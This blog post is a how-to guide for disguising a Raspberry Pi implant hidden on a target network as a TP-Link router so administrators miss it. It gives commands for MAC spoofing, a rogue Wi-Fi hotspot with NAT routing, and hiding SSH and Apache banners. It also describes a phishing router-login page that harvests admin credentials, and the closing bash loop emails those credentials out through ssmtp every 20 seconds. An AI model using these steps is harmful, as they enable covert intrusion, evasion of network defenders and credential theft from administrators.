HomePostsMasking raspberry pi to look like and act like a router
March 10, 2019
Masking raspberry pi to look like and act like a router
This post continuous the story of infiltration in local network onsite with Raspberry pi (link).
When you infiltrate in some serious network, where they have good security team and where system admins do their job on the right way, it is just a manner of time when they will detect your hacking gadget. I mean, when the system admin perform regular scan of the network, and he found new device raspberry pi. Well, I think that we can all imagine the expression on his face. So it is very smart to mask the Pi to looks like something else; like printer, router, windows pc, etc. This will definitely trigger less attention.
In this post I will focus on how to mask raspberry pi to looks like and act like a router. In my case it will looks like TP-Link router. I will also create phishing page for router settings page, with the purpose to catch admins credentials, in the case if he found me and try to login. And I will also set that harvested credentials would be sent on my email.
For the purpose of this post I used raspberry pi w zero with attached two usb wifi antennas.
Here are brief steps we will focus on:
MAC spoof of both antennas
Creating of wifi hotspot (password protected and unprotected)
Hiding of debian version on ssh protocol
Changing of service name on port 80
Creating of phishing page – router settings page
Setting email to receive harvested credentials
1. MAC spoof
Change the MAC address for the both antennas, with the TP-Link Technologies address. Type the following commands
ifconfig wlan1 down macchanger -m f8:d1:11:2a:24:a3 ifconfig wlan1 up
ifconfig wlan2 down macchanger -m f8:d1:11:2a:24:a4 ifconfig wlan2 up
service network-manager restart
Note: after reboot the MAC address will be restored to original MAC address, so the best way to keep the spoofed MAC address is to create script which will run after each boot up.
2. Creating wifi hotspot
You can create password protected or unprotected wifi hotspot. For unprotected one I found great tool on github, which is really easy to set up, while creating password protected is a lit a bit more time consuming.
2.1. Password unprotected wifi hotspot
git clone https://github.com/oblique/create_ap cd create_ap make install
systemctl start create_ap
create_ap wlan2 wlan1 MyAccessPoint
2.2. Password protected wifi hotspot
Download and install hostapd and dnsmasq.
sudo apt-get install hostapd sudo apt-get install dnsmasq service hostapd stop service dnsmasq stop
Define the hotspot interface and IP ranges in the /etc/dnsmasq.conf.
Now your hotspot is created but still does not provide you internet access. So, next you need to configure routing between both wifi adapters. In my case wlan1 is connected to the internet, while wlan2 is used for wifi hotspot.
Uncomment the next line to enable packet forwarding for IPv4 in /etc/sysctl.conf.
Run the following command to activate forwarding:
sh -c “echo 1 > /proc/sys/net/ipv4/ip_forward”
Turn the raspberry pi into the router:
iptables -t nat -A POSTROUTING -o wlan1 -j MASQUERADE iptables -A FORWARD -i wlan1 -o wlan2mon -m state –state RELATED,ESTABLISHED -j ACCEPT iptables -A FORWARD -i wlan2mon -o wlan1 -j ACCEPT
After that save the routing tables into the /etc/iptables.ipv4.nat:
sh -c “iptables-save > /etc/iptables.ipv4.nat”
The following line will restore the routing table whenever the raspberry pi is booted. But in my case was not restored, due to restoring at boot up was performed before wlan2 was putted in monitoring mode (wlan2mon), and practically did not exist yet. But maybe in some circumstances or cases it would work if you figure out to make hotspot running without monitoring mode. However, her is the line which should be added in /etc/network/interfaces.
pre-up iptables-restore < /etc/iptables.ipv4.nat
For the end you need to create bash script which will start up your hotspot. In my case I created hotspot.sh.
!#/bin/bash ifconfig wlan2mon 192.168.2.1 service dnsmasq restart hostapd /etc/hostapd.conf
3. Changing of service name on port 22 and 80
For port 22 you should hide debian version on ssh, so it will not look suspicious in association between router and debian distro. To do this, add the following line in /etc/ssh/sshd_config.
Next, change apache2 service name. Why we should change it. Well, when you perform scan on the router it is not common to see that apache service is running on port 80. So in my case I changed it to TP-LINK WR841N WAP http config.
So in this code you can see that after login it will redirect you to /error folder. In this folder you can create new index.html file which will render e.g. you have no authority to access this router. All harvested credentials will be saved in pass.txt file.
5. Setting email to receive harvested credentials
To receive harvested credentials on your email (Gmail account) you can use ssmtp.
apt-get install ssmtp
Then, add the following lines in configuration file /etc/ssmtp/ssmtp.conf. Change AuthUser and AuthPass lines.
Note: In the gmail account settings you need to allow less secure apps to access your account.
Now you need to create script and make it to run on boot up, which will every 20 sec check, if pass.txt file exist, and If exist it will grep username and password from it and sent to your gmail account.
!#/usr/bin/bash while sleep 20 do if [ -f /var/www/html/pass.txt ] then grep -e user -e pass /var/www/html/pass.txt | ssmtp email@example.com rm -f /var/www/html/pass.txt fi done